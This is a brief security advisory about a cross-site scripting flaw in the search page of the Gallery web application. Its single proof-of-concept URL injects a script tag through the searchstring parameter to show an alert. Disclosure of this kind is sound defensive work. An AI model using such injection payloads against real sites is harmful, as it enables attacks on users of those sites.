Gallery Search Engine Cross-Site Scripting Vulnerability

info
discussion
exploit
solution
references

Gallery Search Engine Cross-Site Scripting Vulnerability

The following proof of concept has been supplied:

http://www.example.com/<galleryfolder>/search.php?searchstring=<script>alert('XSS')</script>